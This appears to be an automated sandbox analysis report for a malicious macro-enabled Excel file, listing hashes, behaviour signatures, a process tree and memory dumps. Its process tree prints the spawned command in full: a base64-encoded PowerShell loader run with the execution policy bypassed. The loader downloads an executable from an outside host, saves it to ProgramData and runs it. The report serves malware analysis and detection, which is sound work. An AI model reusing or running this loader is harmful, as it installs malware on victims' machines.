Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    18/04/2024, 03:02

General

  • Target

    f71e8dfcb74e6e41a97bd6e9c60b5e67_JaffaCakes118.xlsm

  • Size

    41KB

  • MD5

    f71e8dfcb74e6e41a97bd6e9c60b5e67

  • SHA1

    6d78c0a0be761b764fb3c00eda747310e71bf5fc

  • SHA256

    a806686b567ee3c95a5f3467209e88b9ba62bf10f9783004873c802ac4f4cd1d

  • SHA512

    2651cd6f3c998b824b1b63d6e2f95ab53d922697cdd0f576883ea0830b728426773e797e88719ebeaa7e279ef5d6669ae9e494cc1f8bcbb506e773eababd37fd

  • SSDEEP

    768:OH69bfxnua2XpQotJQ/+/0VvhFqe/jAx+Ab7JJCgRd3TTZSxgfCIOW0Zngbc:+6Xua2a4yvhF1/ej3zCS3ZSxPZnR

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f71e8dfcb74e6e41a97bd6e9c60b5e67_JaffaCakes118.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2748
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA==
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2456

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2456-1868-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2456-1869-0x0000000002250000-0x0000000002258000-memory.dmp

    Filesize

    32KB

  • memory/2456-1871-0x0000000002D00000-0x0000000002D80000-memory.dmp

    Filesize

    512KB

  • memory/2456-1870-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

    Filesize

    9.6MB

  • memory/2456-1872-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp

    Filesize

    9.6MB

  • memory/2456-1874-0x0000000002D00000-0x0000000002D80000-memory.dmp

    Filesize

    512KB

  • memory/2456-1873-0x0000000002D00000-0x0000000002D80000-memory.dmp

    Filesize

    512KB

  • memory/2748-1202-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1633-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-397-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-399-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-401-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-403-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-405-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-407-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-409-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-692-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-693-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-695-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-697-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-699-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-701-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-940-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-941-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-943-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-945-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-947-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-949-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1195-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1196-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1198-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1200-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-46-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1204-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1234-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-396-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1320-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1641-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1386-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1388-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1451-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1453-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1508-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1510-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1512-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1513-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1632-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1323-0x00000000726AD000-0x00000000726B8000-memory.dmp

    Filesize

    44KB

  • memory/2748-1636-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1639-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1325-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1643-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1645-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1647-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1638-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1649-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1745-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1747-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1-0x00000000726AD000-0x00000000726B8000-memory.dmp

    Filesize

    44KB

  • memory/2748-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2748-1749-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1830-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1832-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1834-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1835-0x0000000006A30000-0x0000000006B30000-memory.dmp

    Filesize

    1024KB

  • memory/2748-1882-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB